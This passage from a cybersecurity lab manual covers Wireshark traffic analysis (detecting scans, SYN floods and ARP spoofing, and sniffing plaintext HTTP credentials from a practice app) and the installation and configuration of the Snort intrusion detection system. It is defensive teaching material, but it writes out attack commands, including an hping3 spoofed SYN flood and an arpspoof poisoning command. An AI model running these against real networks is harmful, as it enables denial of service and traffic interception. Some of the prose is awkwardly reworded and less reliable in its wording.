Hence the study about Malware Analysis Techniques – Basic static Analysis was a
studied successfully.

56
 EX NO: 8 Network traffic analysis and sniffing using Wireshark

Aim:

To study about Network traffic analysis and sniffing using Wireshark.

Procedure:

Wireshark

Wireshark is a network or protocol analyzer (otherwise called a network sniffer) accessible for free at the
Wireshark website. It is utilized to dissect the structure ofvarious system conventions and can show
encapsulation. The analyzer works on UNIX, Linux, and Microsoft Windows operating frameworks, and uses
the GTK+gadget toolbox and pcap for packet capturing. Wireshark and other terminal- based free programming
renditions like Tshark are released under the GNU General Public License.

Wireshark shares numerous attributes with tcpdump. The thing that matters is that it underpins a graphical user
interface (GUI) and has data filtering [Link]’s more, Wireshark permits the user to see all the traffic
being passed over the network.

This instructional tutorial will get you up to speed with the nuts and bolts of capturing packets, filtering
them, and assessing them. You can utilize Wiresharkto review a suspicious program’s network traffic,
examine the traffic stream on your system, or troubleshoot network issues.

You can download Wireshark for Windows or Mac OS from its official site. In
case you’re utilizing Linux or another UNIX-like framework, you’ll presumably

discover Wireshark in its package repositories. For instance, in case you’re usingUbuntu, you’ll find Wireshark
in the Ubuntu Software Center.

Warning: Many organizations and companies don’t permit Wireshark and similartools to run on their
systems. Try not to use this device at work except if you have authorization.

Launch the Wireshark and select a network interface you want to listen to. Thenclick on the fin icon to
begin capturing packets on that interface. If you need to capture traffic on your wireless system, then you
need to select a wireless interface.

57
As soon as you select the interface’s name, you’ll notice the packets start to appear in real-time. Wireshark
captures each packet that is passing through your system.

Analyzing patterns and signatures of Ping sweeps

This sweep is useful to discover which IPs are dynamic in the system. Ping Sweepcan be performed utilizing
ICMP, TCP, or UDP protocols. The most mainstream one is ICMP Ping Sweep. In the ICMP type 8 — echo
request is trailed by ICMP type 0 — echo reply packets, while in TCP/UDP ping sweep packets are bound to
TCP/UDP port 7, the echo port. On the off chance that the target host doesn’t bolster echo service, at that point,
this TCP/UDP ping scope won’t work.

Consequently, for the most part, the ICMP ping sweep is utilized. However, if there is a firewall in the middle,
then even ICMP ping sweep is useless. In this situation, the ARP scan/ARP sweep can be utilized, which will
discuss later. To distinguish ICMP ping sweep in Wireshark, apply simple filter “[Link]==8 or
[Link]==0”. TCP ping sweep can be distinguished with

58
the “[Link]==7” filter, and for UDP ping sweep “[Link]==7” filter can beutilized. After applying these
filters, on the off chance that we are getting more than anticipated packets, at that point, a ping sweep may be
going on in your system. We should be cautious about the volume of such traffic as it may be typical ping
traffic. It ought to be considered as an output mark just if you are getting an unexpected increment in ICMP
traffic.

Analyzing patterns and signatures of ARP sweeps

As we mentioned in the previous topic, when a firewall is implemented, and the ICMP is blocked, at that point,
we can’t utilize ICMP ping sweep. In such a situation, an ARP scan is used to discover dynamic IPs in the
system. Here, theaggressor sends ARP broadcast for every single imaginable IP in the selected subnet, and on the
off chance that he gets ARP response; at that point, it demonstrates that IP is dynamic. The bit of leeway of this
sweep is that ARP correspondence can’t be filtered or disabled because all TCP/IP correspondence

depends on it. Blocking or disabling ARP communication will break TCP/IP communication, or it will force
static ARP entries, and the drawback of this outputis that it can’t cross layer-three devices. This sweep can be
effectively recognized with the “arp” filter. On the off chance that we are getting staggering numbers of ARP
queries as appeared in the screenshot, it is an indication for ARP scan or ARP sweep.

59
Analyzing patterns and signatures of Stealth port scans

To identify open or closed TCP port on the target system, a Stealth scan is the regularly used method. In this
scan, the aggressor sends an SYN packet on the objective port like a typical TCP correspondence. If the port
is open, the attackerwill get SYN+ACK and RST packets or RST+ACK packets if the port is closed.
After getting SYN+ACK packets on the open port as a response, the aggressor willsend the RST packet because
the attacker wouldn’t want to open a TCP session with an objective. On the off chance that the target port is
firewalled, at that point expected response would be the ICMP type 3 packets with code 1, 2, 3, 9, 10, or 13.

So, if we are getting a great deal of RST packets or ICMP type 3 packets, it verywell may be an indication
for Stealth scan or TCP Full Connect Scan.

To perform a stealth (SYN) scan on the network, use the “nmap -sS [Link]” command in the
“Zenmap” or “Nmap.”

Next, observe the traffic with a Wireshark and compare the patterns.

60
Analyzing patterns and signatures of TCP full connect scans

In this scan, the aggressor will perform a total three-way handshake to see whether the port is open or close.
The aggressor will send the SYN packet to the objective port. If the port is open, the attacker will get an
SYN+ACK packet, and ifthe port is closed, he will get RST+ACK packets. In the wake of getting
SYN+ACK, the attacker will send an ACK packet and attempt to set up a TCP session, and after that, end it.
In Wireshark, we can utilize a comparable technique like TCP Half-open scan to recognize TCP full connect
also. If the target port is firewalled,

at that point, we will get a similar response, which is the ICMP type 3 packets withcode 1, 2, 3, 9, 10, or 13. To
recognize TCP scan packets (TCP Half-open and TCP Full Connect), you can use the followingfilters.

• To get SYN, SYN+ACK, RST and RST+ACK packets, use “[Link]==0x012

or [Link]==0x002 or [Link]==0x004 or [Link]==0x014”filter.

• To get ICMP type 3 packets with code 1, 2, 3, 9, 10, or 13,

use “[Link]==3 and ([Link]==1 or [Link]==2 or [Link]==3 or
[Link]==9 or [Link]==10 or [Link]==13)” filter.

61
Analyzing patterns and signatures of SYN flood attacks

In an SYN flood, the assailant sends a high volume of SYN packets to the server utilizing spoofed IP addresses
making the server send a reply SYN+ACK and leaveits ports half-open, anticipating a reply from a host that
doesn’t exist. In a more straightforward, direct attack, without IP spoofing, the assailant will utilize firewall
standards to dispose of SYN+ACK packets before they reach him. By flooding an objective with SYN packets
and not responding to ACK, an assailant can without much of a stretch overpower the objective’s assets. In this
express, thetarget battles to deal with traffic, which thus will expand CPU utilization and memory utilization, at
last, prompt the exhaustion of its assets. Now the server will never again have the option to serve genuine
customer solicitations and eventually lead to a Denial-of-Service.

In most cases, attackers will use the “hping3” tool or another tool to spoof IP random addresses. The line below
lets us start and direct the SYN flood attack toour target [Link].

Ex: (root@kali:~# hping3 [Link] -S -p 80 — rand-source — flood).

SYN flood assaults are very simple to recognize once you realize what you’re searching for. As you’d expect, a
significant giveaway is the vast amount of SYNpackets being sent to our target device.

Straight away, administrators ought to have the option to take note of the beginning of the assault by an
immense surge of TCP traffic. We can filter for SYNpackets without an affirmation utilizing the following
filter: “[Link] == 1 and [Link] == 0.”

62
As should be obvious, there’s a high volume of SYN packets with next to no fluctuation in time. Each SYN
packet demonstrates it’s from an alternate source IP address with a goal port 80 (HTTP), equal length of (0),
and window size (512).

Analyzing patterns and signatures of ARP spoofing

ARP spoofing includes developing forged ARP replies. By sending forged ARP replies, an objective PC could
be persuaded to send frames bound for PC A insteadgo to PC B. At the point when done appropriately, PC A will
have no clue that thisredirection occurred. The way toward refreshing an objective PC’s ARP reserve with a
forged entry is alluded to as “poisoning.”

To automatically detect ARP packet storms and duplicate IP addresses, we need toperform some configurations
on the Wireshark. First, click on the “Edit” tab and select the

“Preferences…” option.

63
Under the “Protocols,” click the “ARP/RARP” option and select the “Detect ARP request storm” checkbox, and
click “OK.” Wireshark is now ready to detect packet storms and duplicate IP addresses.

Let’s see this in action by scanning our network for live hosts.

Ex: (root@kali:~# netdiscover -i eth0 -r [Link]/24)

The screenshot below shows a vast number of ARP requests. To analyze it, click on the “Analyze” tab
and select the “Expert Information” option from the dropdown menu.

64
In the “Expert Information” window, you will be presented with a bunch of useful information. The main point
here is to look at whether the ARP packet storm was detected or not, which in this case, it did. If you
experienced such traffic in your organization, this means that somebody is scanning your network.

To analyze duplicate IP address traffic, first, run the ARP spoof command fromthe terminal.

Ex: (root@kali:/opt# arpspoof -i eth0 -t [Link] -r [Link]).

Then select one of the ARP packets and click on the “Analyze” tab followed bythe “Expert Information”
option from the drop-down menu.

65
Here we can see a warning telling us that the duplicate IP address has beendetected, which is a clear indication
of a spoofing attempt.

Sniffing usernames and passwords

In this tutorial, we are going to utilize Wireshark to sniff information packets as they are transmitted over the
HTTP convention. For this example, we will sniff the traffic of the web application called “Mutillidae,”
which does not utilize secure correspondence.
First, we need to use the “HTTP” filter to view all HTTP traffic on the screen. Thenunder the “Info” column,
search for the HTTP verb POST entries and click on them. Below the log entries, there is an information panel
with a summary of captured data. Look for the review that says “HTML Form URL Encoded:” and expand it.
You should be able to see the plaintext values of all the POST parameters submitted to the server through the
HTTP convention.

66
Result:

Hence, The study about Network traffic analysis and sniffing using Wireshark hasbeen studied successfully.

67
 EX NO: 9 Intrusion Detection With Snort

Aim:

To study about Intrusion Detection With Snort.

Procedure:

This article explains how to install Snort and how to get started with Snort alerts and rules to
successfully implement an Intrusion Detection System.

Snort is an Intrusion Detection System which analyzes the traffic and packets to detect anomalies, such as
malicious traffic, and report them. If you are not familiar with Intrusion Detection Systems, you may want
to start reading the final conclusion on them If you want to go straight to practical instructions, keep
reading.

After reading this article, you will be able to install Snort on Debian and RedHat based Linux distributions,
set different Snort modes, define alerts and rules. The Snort usage instructions in this tutorial are valid for
all Linux distributions.

All instructions in this document contain screenshots to make it easy for all Linux users to understand and
apply them.

Installing Snort

You can install Snort using the apt packages manager on Debian or Ubuntu as shown in the
following screenshot:

sudo apt install snort

68
During the installation process, you will be asked to define your network. Press OK to continue with
the next step.

Now, type your network address in CIDR format. Normally, Snort auto detects it successfully. Then,

press OK or ENTER. Don’t worry about this step; this configuration can be edited later.

Red Hat based Linux distribution users can download the Snort package from
[Link] and then install it by running the following command, where
<Version> must be replaced with the current version that you downloaded.

sudo yum snort-<<em>Version</em>>.rpm

69
Keeping the snort Rules updated

Snort contains two main types of rules: community rules developed by the Snort community and official rules.
You can always update the community rules by default. Butto update the official rules, you need an Oink
Code
– a code which allows you to download the latest rules.

To get an Oink Code, register at [Link]

After registering, confirm the account from your email and login to the Snort [Link] the

dashboard left side menu, press OinkCode and you will see your code.

[Link] In my case, I used the

Snort [Link] and the following link to download the rules:

[Link]
[Link]?oinkcode=15e4f48aab11b956bb27801172720f2be9f3686d
You can create a cron script to download and extract the rules to the proper directory.

Configuring Snort

Snort configuration file is /etc/snort/[Link]. Before getting started, Debian users must follow the
steps mentioned in the following. Other distro users can continue reading

Check that all the information in this configuration file is correct including the CIDR address, network
device, etc.

Save the file. Let’s start configuring the Snort.

To configure the Snort, use any text editor as shown in the following (I used nano) to open the
/etc/snort/[Link] file.

70
sudo nano /etc/snort/[Link]

sudo nano /etc/snort/[Link]

Define the ports that you want to be monitored.

Don’t close the file and keep reading the next section (keep the configuration file open).

Snort Rules

Snort rules are enabled or disabled by commenting or uncommenting lines in the

/etc/snort/[Link] file. But the rules are stored in the /etc/snort/rules file.

To enable or disable the rules, open the /etc/snort/[Link] with a text editor. Rules arelocated at the end of
the file.
When you reach the end of the file, you will see a list of rules for different purposes. Uncomment the
rules that you want to enable and comment the rules that you want todisable.

For example, to detect the traffic related to DOS attacks, uncomment the DOS rule. Oruncomment the FTP rule
to monitor ports 21.

71
sudo nano /etc/snort/[Link]

After uncommenting the rules, enable, save, and exit the document.

The 7 snort alert zone

Snort includes 7 different alert modes to be notified about events or incidents. The 7modes are the following:

 Fast: Snort alerts include the timestamp, sending an alert message, showing the source
and destination IP addresses and ports. To implement this mode,use the -A fast
 Full: Additionally, in the previously reported information in the fast mode, the fullmode also
prints the TTL, datagram length and packet headers, window size, ACK, and sequence number.
To implement this mode, use the -A full
 Console: It shows the real time alerts in the console. This mode is enabled withthe -Aconsole
 Cmg: This mode is only useful for testing purposes.
 Unsock: This is used to export alerts to Unix sockets.
 Syslog: This mode (System Logging Protocol) instructs Snort to send a remotealert log. Torun
this mode, add -s
 None: No alerts.

To end this article, let’s try the full mode by running the following command, where -Afast indicates
a fast mode scan and -c specifies the configuration file (/etc/snort/[Link]).

sudo snort -A fast -c /etc/snort/[Link]

Now, launch some Nmap scans or try to connect through SSH or FTP to your computer and read the
/var/log/snort/[Link] last lines to check how the traffic is reported. As you can see, I launched an Nmap
aggressive scan and it was detected as a malicious traffic.

tail /var/log/snort/[Link]

72
About Intrusion Detection system

The general thought is that if a firewall is protecting one’s network, the network is considered secure.
However, that is not entirely true. Firewalls are a fundamental component of a network, but they cannot fully
protect the network from forced entries or hostile intent. Intrusion Detection Systems are used to evaluate the
aggressive or unexpected packets and generate an alert before these programs can harm the network. A host-
based Intrusion Detection System runs on all the devices in a network or connects to an organization’s internal
network. A network-based Intrusion Detection System is instead deployed at a certain point or group of points
from which all the ingoing and outgoing traffic can be monitored. The advantage of a host-based Intrusion
Detection System is that it also can detect anomalies or malicious traffic that are generated from the host itself
like if the host is affected by malware, etc. Intrusion Detection Systems(IDS) work by monitoring and
analyzing the network traffic and compares it with an established rule set to determine what should be taken as
normal for the network (forports, bandwidths, etc.) and what to take a closer look at.

An Intrusion Detection System can be deployed depending upon the size of the network. There are dozens of
quality commercial IDS, but many companies and small businesses cannot afford them. Snort is a flexible,
lightweight, and popular Intrusion Detection System that can be deployed according to the needs of the
network, ranging from small to large networks, and provides all the features of a paid IDS. Snort does not cost
anything but that does not mean that it cannot provide the same functionalities as an elite, commercial IDS.
Snort is considered a passive IDS, which means that it sniffs the network packets, compares with the rule set,
and, in the case of detecting a malicious log or entry (detecting an intrusion), it generates an alert or places an
entry in a log file. Snort is used to monitor the operations and activities of routers, firewalls, and servers. Snort
provides a user- friendly interface that contains a chain of rule sets that can be very helpful to a person whois
unfamiliar with IDS. Snort generates an alarm in case of an intrusion (buffer overflow attacks, DNS poisoning,
OS fingerprinting, port scans, and much more), giving an organization a greater visibility of the network traffic
and making it much easier to meet the security regulations.

Conclusion

Intrusion Detection Systems like Snort are used to monitor the network traffic to detect when an attack is being
carried out by a malicious user before it can hurt or affect the network. If an attacker performs a port scan on a
network, the attack can be detected along with the number of attempts made, the attacker’s IP address, and
other details. Snort is used to detect all types of anomalies. It comes with a large number of rules that are
already configured, along with the option for the user to write their own rules according to their needs.

Depending on the size of the network, Snort can easily be set up and used without spending anything, as
compared to the other paid commercial Intrusion Detection Systems. The captured packets can be
analyzed further using a packet sniffer like Wireshark to analyze and break down what is going in the
mind of the attacker during the attack and the types of scans or commands performed. Snort is a free,
open-source, and easy-to-configure tool. It can be a great choice to protect any medium-sized network
from an attack.

Result:

73
Hence, the intrusion Detection system was Studied Successfully.

74